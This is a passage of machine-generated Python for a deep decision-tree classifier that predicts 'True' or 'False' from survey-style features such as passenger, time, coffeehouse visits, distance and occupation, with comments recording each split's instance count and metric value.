if obj[12]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>2:
# {"feature": "Gender", "instances": 100, "metric_value": 0.4744, "depth": 6}
if obj[3]>0:
# {"feature": "Passanger", "instances": 50, "metric_value": 0.4681, "depth": 7}
if obj[0]<=2:
# {"feature": "Distance", "instances": 47, "metric_value": 0.4617, "depth": 8}
if obj[12]>1:
# {"feature": "Coffeehouse", "instances": 30, "metric_value": 0.4159, "depth": 9}
if obj[9]>1.0:
# {"feature": "Education", "instances": 22, "metric_value": 0.3409, "depth": 10}
if obj[6]<=0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.4038, "depth": 11}
if obj[11]<=0:
# {"feature": "Occupation", "instances": 13, "metric_value": 0.4487, "depth": 12}
if obj[7]>1:
# {"feature": "Time", "instances": 12, "metric_value": 0.4792, "depth": 13}
if obj[1]>0:
return 'False'
elif obj[1]<=0:
return 'True'
else: return 'True'
elif obj[7]<=1:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[6]>0:
return 'False'
else: return 'False'
elif obj[9]<=1.0:
# {"feature": "Time", "instances": 8, "metric_value": 0.3667, "depth": 10}
if obj[1]>0:
# {"feature": "Occupation", "instances": 5, "metric_value": 0.2, "depth": 11}
if obj[7]>1:
return 'True'
elif obj[7]<=1:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[6]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Occupation", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[7]<=2:
return 'False'
elif obj[7]>2:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Occupation", "instances": 17, "metric_value": 0.3899, "depth": 9}
if obj[7]>1:
# {"feature": "Time", "instances": 10, "metric_value": 0.3, "depth": 10}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.2143, "depth": 11}
if obj[11]<=0:
# {"feature": "Education", "instances": 7, "metric_value": 0.1429, "depth": 12}
if obj[6]<=0:
return 'True'
elif obj[6]>0:
# {"feature": "Coffeehouse", "instances": 2, "metric_value": 0.0, "depth": 13}
if obj[9]<=0.0:
return 'True'
elif obj[9]>0.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'True'
else: return 'True'
elif obj[7]<=1:
# {"feature": "Coffeehouse", "instances": 7, "metric_value": 0.3429, "depth": 10}
if obj[9]<=2.0:
# {"feature": "Time", "instances": 5, "metric_value": 0.2667, "depth": 11}
if obj[1]<=1:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[6]>1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=1:
return 'True'
else: return 'True'
elif obj[6]<=1:
return 'False'
else: return 'False'
elif obj[1]>1:
return 'True'
else: return 'True'
elif obj[9]>2.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[0]>2:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Education", "instances": 50, "metric_value": 0.4162, "depth": 7}
if obj[6]>0:
# {"feature": "Coffeehouse", "instances": 27, "metric_value": 0.3085, "depth": 8}
if obj[9]>1.0:
# {"feature": "Passanger", "instances": 17, "metric_value": 0.1412, "depth": 9}
if obj[0]>0:
return 'True'
elif obj[0]<=0:
# {"feature": "Time", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[1]>0:
# {"feature": "Occupation", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[7]>2:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[11]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[7]<=2:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]<=1.0:
# {"feature": "Passanger", "instances": 10, "metric_value": 0.4, "depth": 9}
if obj[0]<=1:
# {"feature": "Time", "instances": 9, "metric_value": 0.381, "depth": 10}
if obj[1]<=1:
# {"feature": "Distance", "instances": 7, "metric_value": 0.3429, "depth": 11}
if obj[12]<=2:
# {"feature": "Occupation", "instances": 5, "metric_value": 0.3, "depth": 12}
if obj[7]>6:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.25, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[7]<=6:
return 'True'
else: return 'True'
elif obj[12]>2:
return 'True'
else: return 'True'
elif obj[1]>1:
return 'True'
else: return 'True'
elif obj[0]>1:
return 'False'
else: return 'False'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Distance", "instances": 23, "metric_value": 0.4101, "depth": 8}
if obj[12]<=2:
# {"feature": "Passanger", "instances": 17, "metric_value": 0.4235, "depth": 9}
if obj[0]<=1:
# {"feature": "Coffeehouse", "instances": 15, "metric_value": 0.44, "depth": 10}
if obj[9]<=1.0:
# {"feature": "Time", "instances": 10, "metric_value": 0.4444, "depth": 11}
if obj[1]<=3:
# {"feature": "Occupation", "instances": 9, "metric_value": 0.381, "depth": 12}
if obj[7]>5:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4857, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[7]<=5:
return 'False'
else: return 'False'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[9]>1.0:
# {"feature": "Time", "instances": 5, "metric_value": 0.2667, "depth": 11}
if obj[1]>0:
# {"feature": "Occupation", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[7]<=7:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[0]>1:
return 'True'
else: return 'True'
elif obj[12]>2:
# {"feature": "Time", "instances": 6, "metric_value": 0.1667, "depth": 9}
if obj[1]>0:
return 'False'
elif obj[1]<=0:
# {"feature": "Occupation", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[7]>7:
return 'True'
elif obj[7]<=7:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[8]>1.0:
# {"feature": "Restaurant20to50", "instances": 680, "metric_value": 0.4641, "depth": 3}
if obj[10]<=1.0:
# {"feature": "Time", "instances": 365, "metric_value": 0.4856, "depth": 4}
if obj[1]>0:
# {"feature": "Passanger", "instances": 267, "metric_value": 0.4792, "depth": 5}
if obj[0]<=2:
# {"feature": "Occupation", "instances": 207, "metric_value": 0.4675, "depth": 6}
if obj[7]<=14.155999220544217:
# {"feature": "Distance", "instances": 174, "metric_value": 0.4853, "depth": 7}
if obj[12]<=2:
# {"feature": "Age", "instances": 128, "metric_value": 0.4792, "depth": 8}
if obj[4]<=4:
# {"feature": "Coffeehouse", "instances": 120, "metric_value": 0.4839, "depth": 9}
if obj[9]<=2.0:
# {"feature": "Education", "instances": 75, "metric_value": 0.4876, "depth": 10}
if obj[6]>1:
# {"feature": "Children", "instances": 42, "metric_value": 0.4937, "depth": 11}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 30, "metric_value": 0.4643, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 28, "metric_value": 0.4949, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Gender", "instances": 12, "metric_value": 0.3333, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4286, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=1:
# {"feature": "Gender", "instances": 33, "metric_value": 0.4563, "depth": 11}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.362, "depth": 12}
if obj[11]<=0:
# {"feature": "Children", "instances": 13, "metric_value": 0.4573, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.4667, "depth": 12}
if obj[11]<=0:
# {"feature": "Children", "instances": 15, "metric_value": 0.4786, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[9]>2.0:
# {"feature": "Education", "instances": 45, "metric_value": 0.4387, "depth": 10}
if obj[6]>0:
# {"feature": "Children", "instances": 34, "metric_value": 0.4673, "depth": 11}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 23, "metric_value": 0.4306, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 21, "metric_value": 0.4694, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.3409, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 8, "metric_value": 0.375, "depth": 13}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Gender", "instances": 11, "metric_value": 0.2597, "depth": 11}
if obj[3]>0:
# {"feature": "Children", "instances": 7, "metric_value": 0.3429, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.4, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>4:
# {"feature": "Coffeehouse", "instances": 8, "metric_value": 0.1875, "depth": 9}
if obj[9]>1.0:
return 'False'
elif obj[9]<=1.0:
# {"feature": "Education", "instances": 4, "metric_value": 0.25, "depth": 10}
if obj[6]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[12]>2:
# {"feature": "Children", "instances": 46, "metric_value": 0.4369, "depth": 8}
if obj[5]<=0:
# {"feature": "Coffeehouse", "instances": 34, "metric_value": 0.4592, "depth": 9}
if obj[9]<=2.0:
# {"feature": "Age", "instances": 20, "metric_value": 0.4768, "depth": 10}
if obj[4]<=2:
# {"feature": "Education", "instances": 11, "metric_value": 0.3818, "depth": 11}
if obj[6]<=3:
# {"feature": "Gender", "instances": 10, "metric_value": 0.4, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[6]>3:
return 'True'
else: return 'True'
elif obj[4]>2:
# {"feature": "Education", "instances": 9, "metric_value": 0.4167, "depth": 11}
if obj[6]<=2:
# {"feature": "Gender", "instances": 8, "metric_value": 0.4667, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[9]>2.0:
# {"feature": "Education", "instances": 14, "metric_value": 0.3297, "depth": 10}
if obj[6]<=2:
# {"feature": "Age", "instances": 13, "metric_value": 0.3231, "depth": 11}
if obj[4]>1:
# {"feature": "Gender", "instances": 10, "metric_value": 0.4167, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=1:
return 'True'
else: return 'True'
elif obj[6]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 12, "metric_value": 0.2, "depth": 9}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
# {"feature": "Age", "instances": 5, "metric_value": 0.3, "depth": 10}
if obj[4]>0:
# {"feature": "Coffeehouse", "instances": 4, "metric_value": 0.25, "depth": 11}
if obj[9]<=2.0:
return 'True'
elif obj[9]>2.0:
# {"feature": "Education", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[6]>2:
return 'True'
elif obj[6]<=2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>14.155999220544217:
# {"feature": "Age", "instances": 33, "metric_value": 0.2458, "depth": 7}
if obj[4]<=2:
# {"feature": "Gender", "instances": 24, "metric_value": 0.1212, "depth": 8}
if obj[3]<=0:
# {"feature": "Coffeehouse", "instances": 22, "metric_value": 0.0808, "depth": 9}
if obj[9]>2.0:
return 'False'
elif obj[9]<=2.0:
# {"feature": "Distance", "instances": 9, "metric_value": 0.1111, "depth": 10}
if obj[12]>1:
return 'False'
elif obj[12]<=1:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=1:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[6]<=3:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.0, "depth": 9}
if obj[11]>0:
return 'True'
elif obj[11]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[4]>2:
# {"feature": "Distance", "instances": 9, "metric_value": 0.2963, "depth": 8}
if obj[12]>1:
# {"feature": "Coffeehouse", "instances": 6, "metric_value": 0.2222, "depth": 9}
if obj[9]>1.0:
return 'True'
elif obj[9]<=1.0:
# {"feature": "Children", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[5]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[3]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[6]<=2:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[12]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>2:
# {"feature": "Age", "instances": 60, "metric_value": 0.4169, "depth": 6}
if obj[4]<=6:
# {"feature": "Coffeehouse", "instances": 59, "metric_value": 0.3999, "depth": 7}
if obj[9]<=2.0:
# {"feature": "Children", "instances": 43, "metric_value": 0.438, "depth": 8}
if obj[5]<=0:
# {"feature": "Occupation", "instances": 35, "metric_value": 0.419, "depth": 9}
if obj[7]<=16:
# {"feature": "Education", "instances": 33, "metric_value": 0.4409, "depth": 10}
if obj[6]<=2:
# {"feature": "Gender", "instances": 31, "metric_value": 0.4363, "depth": 11}
if obj[3]<=0:
# {"feature": "Distance", "instances": 24, "metric_value": 0.4351, "depth": 12}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 19, "metric_value": 0.4654, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Distance", "instances": 7, "metric_value": 0.2381, "depth": 12}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[12]<=1:
return 'False'
else: return 'False'
else: return 'True'
elif obj[6]>2:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 11}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[7]>16:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 8, "metric_value": 0.375, "depth": 9}
if obj[3]<=0:
# {"feature": "Occupation", "instances": 6, "metric_value": 0.25, "depth": 10}
if obj[7]<=15:
# {"feature": "Education", "instances": 4, "metric_value": 0.25, "depth": 11}
if obj[6]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[11]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[7]>15:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[9]>2.0:
# {"feature": "Education", "instances": 16, "metric_value": 0.1786, "depth": 8}
if obj[6]<=2:
# {"feature": "Occupation", "instances": 14, "metric_value": 0.1143, "depth": 9}
if obj[7]>6:
return 'True'
elif obj[7]<=6:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[3]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>2:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 9}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[4]>6:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Passanger", "instances": 98, "metric_value": 0.4319, "depth": 5}
if obj[0]<=1:
# {"feature": "Distance", "instances": 90, "metric_value": 0.4178, "depth": 6}
if obj[12]<=1:
# {"feature": "Occupation", "instances": 46, "metric_value": 0.3188, "depth": 7}
if obj[7]>3:
# {"feature": "Gender", "instances": 33, "metric_value": 0.4139, "depth": 8}
if obj[3]<=0:
# {"feature": "Age", "instances": 26, "metric_value": 0.3523, "depth": 9}
if obj[4]<=5:
# {"feature": "Education", "instances": 23, "metric_value": 0.3066, "depth": 10}
if obj[6]<=2:
# {"feature": "Coffeehouse", "instances": 19, "metric_value": 0.2481, "depth": 11}
if obj[9]<=2.0:
# {"feature": "Children", "instances": 14, "metric_value": 0.3214, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.375, "depth": 13}
if obj[11]<=1:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[9]>2.0:
return 'True'
else: return 'True'
elif obj[6]>2:
# {"feature": "Coffeehouse", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[9]<=2.0:
# {"feature": "Children", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=1:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[9]>2.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>5:
# {"feature": "Coffeehouse", "instances": 3, "metric_value": 0.0, "depth": 10}
if obj[9]<=1.0:
return 'False'
elif obj[9]>1.0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[3]>0:
# {"feature": "Coffeehouse", "instances": 7, "metric_value": 0.2286, "depth": 9}
if obj[9]<=2.0:
# {"feature": "Age", "instances": 5, "metric_value": 0.0, "depth": 10}
if obj[4]>0:
return 'False'
elif obj[4]<=0:
return 'True'
else: return 'True'
elif obj[9]>2.0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[7]<=3:
return 'True'
else: return 'True'
elif obj[12]>1:
# {"feature": "Occupation", "instances": 44, "metric_value": 0.4325, "depth": 7}
if obj[7]>4:
# {"feature": "Education", "instances": 33, "metric_value": 0.3866, "depth": 8}
if obj[6]>0:
# {"feature": "Coffeehouse", "instances": 23, "metric_value": 0.4551, "depth": 9}
if obj[9]<=2.0:
# {"feature": "Age", "instances": 15, "metric_value": 0.4636, "depth": 10}
if obj[4]>0:
# {"feature": "Gender", "instances": 11, "metric_value": 0.4949, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 9, "metric_value": 0.4921, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4898, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[3]>0:
# {"feature": "Children", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]>2.0:
# {"feature": "Gender", "instances": 8, "metric_value": 0.1667, "depth": 10}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
# {"feature": "Age", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[4]>2:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.0, "depth": 9}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[7]<=4:
# {"feature": "Coffeehouse", "instances": 11, "metric_value": 0.3697, "depth": 8}
if obj[9]>1.0:
# {"feature": "Education", "instances": 6, "metric_value": 0.1667, "depth": 9}
if obj[6]>0:
return 'False'
elif obj[6]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[9]<=1.0:
# {"feature": "Age", "instances": 5, "metric_value": 0.3, "depth": 9}
if obj[4]>0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 10}
if obj[3]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[5]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[6]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[0]>1:
# {"feature": "Age", "instances": 8, "metric_value": 0.3, "depth": 6}
if obj[4]>0:
# {"feature": "Education", "instances": 5, "metric_value": 0.3, "depth": 7}
if obj[6]>0:
# {"feature": "Occupation", "instances": 4, "metric_value": 0.0, "depth": 8}
if obj[7]>5:
return 'True'
elif obj[7]<=5:
return 'False'
else: return 'False'
elif obj[6]<=0:
return 'False'
else: return 'False'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Education", "instances": 315, "metric_value": 0.417, "depth": 4}
if obj[6]>1:
# {"feature": "Time", "instances": 197, "metric_value": 0.451, "depth": 5}
if obj[1]>0:
# {"feature": "Passanger", "instances": 150, "metric_value": 0.4737, "depth": 6}
if obj[0]<=2:
# {"feature": "Coffeehouse", "instances": 119, "metric_value": 0.462, "depth": 7}
if obj[9]<=3.0:
# {"feature": "Occupation", "instances": 94, "metric_value": 0.4693, "depth": 8}
if obj[7]<=17:
# {"feature": "Age", "instances": 82, "metric_value": 0.4832, "depth": 9}
if obj[4]>0:
# {"feature": "Distance", "instances": 70, "metric_value": 0.4695, "depth": 10}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 43, "metric_value": 0.4213, "depth": 11}
if obj[11]<=0:
# {"feature": "Children", "instances": 39, "metric_value": 0.4217, "depth": 12}
if obj[5]<=0:
# {"feature": "Gender", "instances": 30, "metric_value": 0.4444, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Gender", "instances": 9, "metric_value": 0.3444, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 12}
if obj[3]>0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Children", "instances": 27, "metric_value": 0.4701, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 26, "metric_value": 0.455, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.4974, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.3967, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[4]<=0:
# {"feature": "Children", "instances": 12, "metric_value": 0.3704, "depth": 10}
if obj[5]<=0:
# {"feature": "Distance", "instances": 9, "metric_value": 0.381, "depth": 11}
if obj[12]<=2:
# {"feature": "Gender", "instances": 7, "metric_value": 0.4048, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.3333, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[12]>2:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>17:
# {"feature": "Age", "instances": 12, "metric_value": 0.2222, "depth": 9}
if obj[4]>2:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4, "depth": 10}
if obj[11]<=0:
# {"feature": "Distance", "instances": 5, "metric_value": 0.4, "depth": 11}
if obj[12]<=2:
# {"feature": "Gender", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[3]<=1:
# {"feature": "Children", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[5]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[12]>2:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[4]<=2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]>3.0:
# {"feature": "Direction_same", "instances": 25, "metric_value": 0.2087, "depth": 8}
if obj[11]<=0:
# {"feature": "Children", "instances": 23, "metric_value": 0.1957, "depth": 9}
if obj[5]<=0:
# {"feature": "Distance", "instances": 12, "metric_value": 0.3429, "depth": 10}
if obj[12]>1:
# {"feature": "Occupation", "instances": 7, "metric_value": 0.1905, "depth": 11}
if obj[7]<=1:
return 'True'
elif obj[7]>1:
# {"feature": "Age", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[4]<=1:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[3]<=0:
return 'True'
else: return 'True'
elif obj[4]>1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Gender", "instances": 5, "metric_value": 0.4667, "depth": 11}
if obj[3]>0:
# {"feature": "Age", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[4]>1:
